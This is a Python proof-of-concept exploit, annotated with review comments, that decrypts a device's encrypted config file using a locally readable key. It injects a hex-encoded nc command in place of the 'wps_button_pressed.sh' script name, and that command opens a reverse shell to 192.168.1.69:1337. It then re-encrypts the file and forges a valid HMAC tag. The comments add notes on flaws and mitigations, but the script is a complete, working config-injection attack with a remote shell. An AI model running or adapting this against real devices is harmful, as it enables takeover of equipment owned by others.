#!/usr/bin/env python3
# poc config injection exploit
from Crypto.Cipher import AES
import hmac
import hashlib
# Key material: the whole file is used as the HMAC key and its first 32 bytes
# as the AES key (see below), so both secrets live in one readable file.
try:
    inputkey = open ("proc_rip_0108", "rb")
except:  # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
    print ("Cannot open encryption key file ./proc_rip_0108")
    exit()
# Encrypted config container that gets decrypted, edited and rebuilt.
try:
    inputfile = open ("config.bin", "rb")
except:  # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
    print ("Cannot open file ./config.bin")
    exit()
# reverse shell on 192.168.1.69:1337
# Hex-encoded command bytes that replace the script name in the plaintext.
payload: str = "6e63203139322e3136382e312e36392031333337202d65202f62696e2f7368207c7c2074727565"
hmac_key: bytes = inputkey.read()
# 32-byte key -> AES-256. The AES key is a prefix of the HMAC key, so there is
# no key separation between the confidentiality and integrity functions.
aes_key: bytes = hmac_key[:32]
config: bytes = inputfile.read()
sz: int = len(config)
# Container layout as parsed here: header up to and including the first blank
# line, then a 16-byte CBC IV, then the ciphertext, then a 20-byte trailer
# (the HMAC-SHA1 tag, see hmac_new below).
# NOTE(review): if b"\n\n" is absent, find() returns -1 and header_end becomes
# 1, so every slice below is silently misaligned.
header_end: int = config.find(b"\n\n") + 2
header_data: bytes = config[:header_end]
iv_end: int = header_end + 16
aes_end: int = sz - 20
iv: bytes = config[header_end:iv_end]
aes_data: bytes = config[iv_end:aes_end]
hmac_data: bytes = config[aes_end:]
print ("File size: " + str(sz))
print ("IV " + str(len(iv)) + " " + iv.hex())
print ("HMAC " + str(len(hmac_data)) + " " + hmac_data.hex())
print ("AES data " + str(len(aes_data)))
# decrypt: AES-CBC with the key prefix and the IV taken from the container.
# NOTE(review): the existing tag in hmac_data is printed but never verified, so
# a wrong key or a corrupt file only shows up as garbage plaintext.
cipher_dec = AES.new (aes_key, AES.MODE_CBC, iv)
decrypted_raw: bytes = cipher_dec.decrypt (aes_data)
# remove padding: PKCS#7 style, the last byte gives the pad length; the pad
# bytes themselves are not validated.
decrypted: bytes = decrypted_raw[:-decrypted_raw[-1]]
# Plaintext dump; also the reference copy for diffing against the patched text.
decrypted_file = open("config.txt", "w")
decrypted_file.write(decrypted.decode("utf-8"))
decrypted_file.close()
# patch: swap the script name for the payload bytes. The comment above implies
# this field ends up executed as a shell command on the consuming side.
patched: bytes = decrypted.replace (b"wps_button_pressed.sh", bytes.fromhex(payload))
patch_file = open("config_patched.txt", "w")
patch_file.write(patched.decode("utf-8"))
patch_file.close()
# add padding: pad up to the 16-byte block size only when not already aligned.
# Strict PKCS#7 would append a full block here; whether the consumer accepts
# the unpadded aligned case is not shown in this script.
patched_len: int = len(patched) % 16
if patched_len:
    add_pad = 16 - patched_len
    pad = add_pad * chr(add_pad)
    patched += bytes(pad, "utf-8")
# encrypt: re-encrypts under the same key AND the original IV, so ciphertext
# blocks before the first modified plaintext block stay byte-identical to the
# original. A byte-level diff of config.bin against config_patched.bin pinpoints
# the edit, which is a cheap integrity-monitoring signal on the defending side.
cipher_enc = AES.new (aes_key, AES.MODE_CBC, iv)
encrypted: bytes = cipher_enc.encrypt (patched)
# calc new hmac: HMAC-SHA1 over header + IV + ciphertext with the full key file.
# The design weakness this PoC relies on: integrity and confidentiality are
# both bound to a single locally readable key, so whoever can read it can
# produce a config that passes the tag check. Mitigations for the consumer:
# sign configs with an asymmetric key of which the device holds only the
# public half, keep symmetric keys in hardware-backed storage, and do not
# let a tag-valid config carry arbitrary command strings.
hmac_new: bytes = hmac.new(hmac_key, header_data + iv + encrypted, digestmod=hashlib.sha1).digest()
out = open ("config_patched.bin", "wb")
out.write(header_data)
out.write(iv)
out.write(encrypted)
out.write(hmac_new)
out.close()
print ("Written config_patched.bin")